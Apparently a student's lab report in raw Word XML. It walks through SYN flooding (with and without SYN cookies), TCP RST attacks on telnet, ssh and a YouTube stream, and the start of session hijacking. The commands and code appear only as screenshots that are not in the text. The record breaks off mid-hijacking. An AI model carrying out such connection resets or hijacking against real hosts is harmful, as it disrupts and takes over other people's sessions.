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8879F3" w14:textId="60B25C99" w:rsidR="000916FF" w:rsidRDefault="00552178">
      <w:r>
        <w:t>Mark Gameng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35974315" w14:textId="0131B1C4" w:rsidR="00552178" w:rsidRDefault="00552178">
      <w:r>
        <w:t>CS 458 – Dong Jin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D7016" w14:textId="2475EE6E" w:rsidR="00552178" w:rsidRDefault="00552178" w:rsidP="00552178">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66700296" w14:textId="4C5243FF" w:rsidR="00552178" w:rsidRDefault="00552178" w:rsidP="00552178">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3.1</w:t>
      </w:r>
      <w:r w:rsidR="005259A9">
        <w:t xml:space="preserve"> – SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58D4E2" w14:textId="77777777" w:rsidR="002F168E" w:rsidRDefault="00D2698C" w:rsidP="00552178">
      <w:r>
        <w:t>The 3 VMS are the Client(10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00B602D2">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>), the Server(</w:t>
      </w:r>
      <w:r w:rsidR="00554979">
        <w:t>10.0.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>), and the Attacker(10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00554979">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58535CD0" w14:textId="381B1AE7" w:rsidR="002F168E" w:rsidRDefault="002F168E" w:rsidP="00552178">
      <w:r>
        <w:t>First set the SYN cookie mechanism to off.</w:t>
      </w:r>
      <w:r w:rsidR="00E41C83">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E41C83">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4951894E" wp14:editId="51217FAA">
            <wp:extent cx="5292090" cy="3352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292090" cy="335280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3E6D7" w14:textId="78A05732" w:rsidR="002F168E" w:rsidRDefault="002F168E" w:rsidP="00552178">
      <w:r>
        <w:t>Then by doing netstat -</w:t>
      </w:r>
      <w:r w:rsidR="00E019EB">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>na, it shows the usage of the queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246C31AB" w14:textId="5F7F336E" w:rsidR="002F168E" w:rsidRDefault="00E019EB" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9A07EE" wp14:editId="6F2BE674">
            <wp:extent cx="4606290" cy="2221892"/>
            <wp:effectExtent l="0" t="0" r="381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617728" cy="2227409"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005259A9">
        <w:t>This shows that all the states are LISTEN, and there are no half-open connections because SYN_REC is not in any of the states.</w:t>
      </w:r>
      <w:r w:rsidR="00104B00">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00104B00">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55DFD9A4" wp14:editId="0FC885DA">
            <wp:extent cx="5467350" cy="30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67350" cy="304800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4FDEB" w14:textId="01BBAB66" w:rsidR="00104B00" w:rsidRDefault="00104B00" w:rsidP="00552178">
      <w:r>
        <w:t>This shows that the max size of the queue is 128, so when there are 128 half-open connections or states that have SYN_RECV, the system cannot take any more connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A239B0F" w14:textId="0BA8D79A" w:rsidR="00A42234" w:rsidRDefault="005259A9" w:rsidP="00552178">
      <w:r>
        <w:t>Now we can start the SYN flooding attack by doing the following command on the attacker VM:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C62775" wp14:editId="1324542A">
            <wp:extent cx="4469130" cy="1828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69130" cy="182880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E288D48" w14:textId="77777777" w:rsidR="00B569A1" w:rsidRDefault="001703F5" w:rsidP="00552178">
      <w:r>
        <w:t>Then on the client machine, checking netstat once again, we see that there are now tons of SYN_RECV states.</w:t>
      </w:r>
      <w:r w:rsidR="008D606D">
        <w:t xml:space="preserve"> This shows that the SYN flooding attack worked.</w:t>
      </w:r>
      <w:r w:rsidR="00104B00">
        <w:t xml:space="preserve"> All the half-open states have random foreign</w:t>
      </w:r>
      <w:r w:rsidR="00590E08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00104B00">
        <w:t>addresses</w:t>
      </w:r>
      <w:r w:rsidR="007B5B0A">
        <w:t xml:space="preserve"> all coming in to 10.0.2.4:23</w:t>
      </w:r>
      <w:r w:rsidR="00B569A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CB3AD" w14:textId="6E5D58E7" w:rsidR="005259A9" w:rsidRDefault="005259A9" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C8C99B1" wp14:editId="6EC8A6C9">
            <wp:extent cx="4846320" cy="302778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47927" cy="3028788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E344112" w14:textId="1A5F51E5" w:rsidR="001B52C0" w:rsidRDefault="001B52C0" w:rsidP="00552178">
      <w:r>
        <w:t xml:space="preserve">I know this attack worked because when I try to connect to 10.0.2.4, it gets stuck because the queue became full because of the attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D57736" w14:textId="0DCA85B2" w:rsidR="001B52C0" w:rsidRDefault="002511B2" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B07169" wp14:editId="234E6CB3">
            <wp:extent cx="5238750" cy="502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8750" cy="502920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77B56A" w14:textId="794D2453" w:rsidR="002511B2" w:rsidRDefault="009177A0" w:rsidP="00552178">
      <w:r>
        <w:t>Now set the SYN cookie mechanism to on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F777F30" w14:textId="6B9FEC2A" w:rsidR="009177A0" w:rsidRDefault="009177A0" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E19A40D" wp14:editId="7C04911C">
            <wp:extent cx="5162550" cy="346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62550" cy="346710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71340356" w14:textId="1E1E9291" w:rsidR="009177A0" w:rsidRDefault="009177A0" w:rsidP="00552178">
      <w:r>
        <w:t>Then ran the attack again</w:t>
      </w:r>
      <w:r w:rsidR="00FD01E4">
        <w:t>. Checking netstat, we see there are still lots of SYN_RECV states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E99680" w14:textId="13DD0553" w:rsidR="00FD01E4" w:rsidRDefault="00FD01E4" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B61CD98" wp14:editId="7DF65383">
            <wp:extent cx="4999414" cy="2887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99749" cy="2888174"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122039E" w14:textId="53F7D185" w:rsidR="00FD01E4" w:rsidRDefault="00FD01E4" w:rsidP="00552178">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>However connecting through telnet, it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652DAFFC" w14:textId="3A75CA6D" w:rsidR="00FD01E4" w:rsidRDefault="00FD01E4" w:rsidP="00552178">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5687FB49" wp14:editId="2D630835">
            <wp:extent cx="3272790" cy="100965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72790" cy="1009650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E378EF" w14:textId="36C2BB7D" w:rsidR="00FD01E4" w:rsidRDefault="00FD01E4" w:rsidP="00552178">
      <w:r>
        <w:t>Thus, we see that by setting the SYN cookie mechanism to on, the SYN flooding attack does not work as usual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F7C4E" w14:textId="7B5386F9" w:rsidR="008C1740" w:rsidRDefault="008C1740" w:rsidP="00552178">
      <w:r>
        <w:t>SYN cookie effectively protects the machine against the SYN flooding attack because the server replies to TCP SYN requests with crafted SYN-ACKS, without inserting a new record to its SYN queue. The SYN flooding attack works because it fills up the queue so no other connections can be added, but with the SYN cookie mechanism, it doesn’t fill up the queue so others can still connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6DEBB4" w14:textId="098A91A5" w:rsidR="008C1740" w:rsidRDefault="004608D8" w:rsidP="004608D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3.2 – TCP RST Attack on telnet and ssh connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240215A0" w14:textId="15165FA6" w:rsidR="004608D8" w:rsidRDefault="00F74159" w:rsidP="004608D8">
      <w:r>
        <w:t>First we connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166017FB" w14:textId="3941D3D3" w:rsidR="00F74159" w:rsidRDefault="00F74159" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F97FDDF" wp14:editId="037AE3EB">
            <wp:extent cx="4872990" cy="129648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86827" cy="1300165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6817A0" w14:textId="722732A5" w:rsidR="00F74159" w:rsidRDefault="008658C4" w:rsidP="004608D8">
      <w:r>
        <w:t>Then we run the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEEA96" w14:textId="04154C97" w:rsidR="008658C4" w:rsidRDefault="008658C4" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B584410" wp14:editId="5DFC095D">
            <wp:extent cx="3996690" cy="1752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96690" cy="175260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027FE91" w14:textId="4256B043" w:rsidR="008658C4" w:rsidRDefault="00FF2BF4" w:rsidP="004608D8">
      <w:r>
        <w:t>Going back to our connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4D3CF" w14:textId="4B15C003" w:rsidR="00FF2BF4" w:rsidRDefault="00FF2BF4" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5788D997" wp14:editId="48824134">
            <wp:extent cx="4324350" cy="25154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8904" cy="2518143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C740909" w14:textId="3B4ED3A0" w:rsidR="00FF2BF4" w:rsidRDefault="00FF2BF4" w:rsidP="004608D8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We see that once we do anything, we see that the connection is closed, due to the SYN flooding attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1975A5" w14:textId="66A29157" w:rsidR="002E40A8" w:rsidRDefault="002E40A8" w:rsidP="004608D8">
      <w:r>
        <w:t>Now, we try to do the same thing for a ssh connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D4095F" w14:textId="20FAD4EE" w:rsidR="002E40A8" w:rsidRDefault="00167F46" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4755095F" wp14:editId="13F0BC30">
            <wp:extent cx="5433060" cy="235235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0069" cy="2355386"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7812E" w14:textId="7A0EFD63" w:rsidR="00167F46" w:rsidRDefault="00167F46" w:rsidP="004608D8">
      <w:r>
        <w:t>Once I ran the attack, and then typed anything on the ssh connection, it leads to a broken pipe which makes the connection to be closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BAC49" w14:textId="4D8B5082" w:rsidR="00167F46" w:rsidRDefault="00167F46" w:rsidP="004608D8">
      <w:r>
        <w:t>Thus, I have shown TCP RST attacks on telnet and ssh connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C6BF5" w14:textId="5E2C1797" w:rsidR="00167F46" w:rsidRDefault="00167F46" w:rsidP="004608D8">
      <w:r>
        <w:t>We can also use Scapy to do the TCP RST attack</w:t>
      </w:r>
      <w:r w:rsidR="00A958F0">
        <w:t xml:space="preserve">. To get all the relevant info, open up WireShark and get </w:t>
      </w:r>
      <w:r w:rsidR="00F028EA">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A958F0">
        <w:t xml:space="preserve"> packet sent when you</w:t>
      </w:r>
      <w:r w:rsidR="00F028EA">
        <w:t xml:space="preserve"> telnet connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91F743" w14:textId="6C11709C" w:rsidR="00F028EA" w:rsidRDefault="00630B82" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769C58B6" wp14:editId="25C8811E">
            <wp:extent cx="3985260" cy="21970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97397" cy="2203693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C2AAB" w14:textId="039113BA" w:rsidR="00F028EA" w:rsidRDefault="00476998" w:rsidP="004608D8">
      <w:r>
        <w:t>I then put the relevant information in the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE7194" w14:textId="5AE7569A" w:rsidR="00476998" w:rsidRDefault="00BB40A1" w:rsidP="004608D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F9F89C" wp14:editId="3A2D77DB">
            <wp:extent cx="4495800" cy="117081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10870" cy="1174736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C299FF" w14:textId="5E968F60" w:rsidR="00A74433" w:rsidRDefault="00E205EC" w:rsidP="00E205EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When the code is ran, then it should result in the connection being closed. Same process with ssh connection. However, </w:t>
      </w:r>
      <w:r w:rsidR="0067706E">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>n my case, It wouldn’t work and the connection didn’t close despite me running the code</w:t>
      </w:r>
      <w:r w:rsidR="003B09AA">
        <w:t xml:space="preserve">, though the process </w:t>
      </w:r>
      <w:r w:rsidR="00855E0C">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00113BFC">
        <w:t xml:space="preserve">did, I </w:t>
      </w:r>
      <w:r w:rsidR="00855E0C">
        <w:t xml:space="preserve">think </w:t>
      </w:r>
      <w:r w:rsidR="00F933B9">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00855E0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B09AA">
        <w:t>correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C68E4" w14:textId="33BB423D" w:rsidR="00B158B2" w:rsidRDefault="00B158B2" w:rsidP="004608D8">
      <w:r>
        <w:t>Thus, we have done TCP RST attacks through command line and scapy on telnet and ssh connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509098FC" w14:textId="13390600" w:rsidR="002669A7" w:rsidRDefault="00436A4C" w:rsidP="00436A4C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00FB163A">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB163A">
        <w:t>TCP RST Attack on Video Streaming Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7E620" w14:textId="71BF00D0" w:rsidR="00AE688F" w:rsidRDefault="00A54951" w:rsidP="00AE688F">
      <w:r>
        <w:t xml:space="preserve">I load up a video on youtube </w:t>
      </w:r>
      <w:r w:rsidR="00A13DAE">
        <w:t>on the machine with IP 10.0.2.4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F1895" w14:textId="5C947BD8" w:rsidR="00A13DAE" w:rsidRDefault="00DF2D68" w:rsidP="00AE688F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441E2891" wp14:editId="0028B739">
            <wp:extent cx="3784449" cy="20574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01061" cy="2066431"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517443E6" w14:textId="0B6BDBA0" w:rsidR="0017203D" w:rsidRDefault="0017203D" w:rsidP="00AE688F">
      <w:r>
        <w:t>Then started the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D52DEA" w14:textId="5F96C6B0" w:rsidR="0017203D" w:rsidRDefault="0017203D" w:rsidP="00AE688F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D619DC" wp14:editId="0C9B13DE">
            <wp:extent cx="5939790" cy="1752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175260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05386CA1" w14:textId="77777777" w:rsidR="001C5AE6" w:rsidRDefault="00F62B7E" w:rsidP="004608D8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The video starts buffering and can’t start up again. I also reloaded and get this error:</w:t>
      </w:r>
      <w:r w:rsidR="001C5AE6" w:rsidRPr="001C5AE6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55413A39" w14:textId="77777777" w:rsidR="001C5AE6" w:rsidRDefault="001C5AE6" w:rsidP="004608D8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C701F3E" wp14:editId="1CBB2A7B">
            <wp:extent cx="5213051" cy="299466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22023" cy="2999814"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE9C2D" w14:textId="77777777" w:rsidR="00D030E5" w:rsidRDefault="001C5AE6" w:rsidP="004608D8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25329552" wp14:editId="2F1E455B">
            <wp:extent cx="4278630" cy="191434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5139" cy="1917257"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E1266" w14:textId="55457C2D" w:rsidR="005B7385" w:rsidRDefault="00A1740C" w:rsidP="004608D8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Thus, </w:t>
      </w:r>
      <w:r w:rsidR="001C5AE6" w:rsidRPr="001C5AE6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D81260">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>we have disrupted the video streaming by breaking the TCP connection between the victim and the server using a TCP RST attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9BE1C" w14:textId="746A7BB1" w:rsidR="00D81260" w:rsidRDefault="00C67154" w:rsidP="00C67154">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3.4 – TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34182B64" w14:textId="78F6F63F" w:rsidR="00C67154" w:rsidRDefault="003E5221" w:rsidP="00C67154">
      <w:r>
        <w:t>I first got the hex of the command I want to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551C9C5" w14:textId="3A501111" w:rsidR="003E5221" w:rsidRDefault="003E5221" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763C8A48" wp14:editId="283914A7">
            <wp:extent cx="3227070" cy="350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27070" cy="350520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB7C9D" w14:textId="6E37E3ED" w:rsidR="003E5221" w:rsidRDefault="00DE7111" w:rsidP="00C67154">
      <w:r>
        <w:t>I then used wireshark again to get all the relevant information to use in the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FE605" w14:textId="74FB80B1" w:rsidR="00DE7111" w:rsidRDefault="004F609B" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3029DE28" wp14:editId="5C639FEF">
            <wp:extent cx="5943600" cy="17106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1710690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F863B" w14:textId="4A8F5C60" w:rsidR="00860B67" w:rsidRDefault="00985890" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5976545D" wp14:editId="4532D7D8">
            <wp:extent cx="5943600" cy="3543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54330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
